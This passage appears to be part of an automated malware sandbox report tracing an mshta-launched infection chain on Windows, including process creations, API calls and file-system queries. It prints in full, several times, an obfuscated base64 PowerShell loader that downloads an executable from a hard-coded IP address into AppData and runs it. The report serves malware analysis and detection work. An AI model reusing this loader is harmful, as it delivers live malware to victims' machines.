iNvOke-ExPrEssioN($(inVOkE-EXPrESsiON('[SysTEm.tEXt.EncodinG]'+[CHAr]58+[ChAR]58+'UTf8.gEtSTRing([sYStEM.CoNVeRt]'+[CHAR]58+[Char]0x3a+'FRoMbasE64stRinG('+[chAr]0x22+'JG9ZdHRwUm5vICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFZmluSXRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NjYk9WYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZ2QktSVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBiTUNmTnR4cCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcVBpZ1RIQkosSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCdFJmbmN1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkhmVUhiZkVLRUIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRXNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3c0FNS05icCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG9ZdHRwUm5vOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3NS4xMTMuMTk2LzQwMC93aW4uZXhlIiwiJGVudjpBUFBEQVRBXHdpbm5pdC5leGUiLDAsMCk7U3RBcnQtc0xlRVAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSI='+[Char]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\winnit.exe "C:\Users\user\AppData\Roaming\winnit.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3925.tmp" "c:\Users\user\AppData\Local\Temp\5zyziwbf\CSCADB73B4CC47C40A8804A92B1B0BD1E62.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\winnit.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jg9zdhrwum5vicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbbreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1lbwjlumrfzmlusxrpb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvcmxtb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagq0njyk9wyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihz2qktsvyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagihbitunmtnr4ccx1aw50icagicagicagicagicagicagicagicagicagicagicbdcvbpz1riqkossw50uhryicagicagicagicagicagicagicagicagicagicagicbcdfjmbmn1ktsnicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagikhmvuhizkvlruiiicagicagicagicagicagicagicagicagicagicagicatbmftrxnwyunficagicagicagicagicagicagicagicagicagicagicb3c0fns05iccagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjg9zdhrwum5vojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmta3lje3ns4xmtmumtk2lzqwmc93aw4uzxhliiwijgvudjpbufbeqvrbxhdpbm5pdc5leguildasmck7u3rbcnqtc0xlrvaomyk7sukgicagicagicagicagicagicagicagicagicagicagicikrw5wokfquerbvefcd2lubml0lmv4zsi='+[char]0x22+'))')))"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B07CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

6_2_00B07CAF

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

6_2_00B0874B

Source: winnit.exe, 00000006.00000002.2186302265.0000000000B64000.00000002.00000001.01000000.0000000C.sdmp, win[1].exe.3.dr, winnit.exe.3.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: winnit.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AD862B cpuid

6_2_00AD862B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
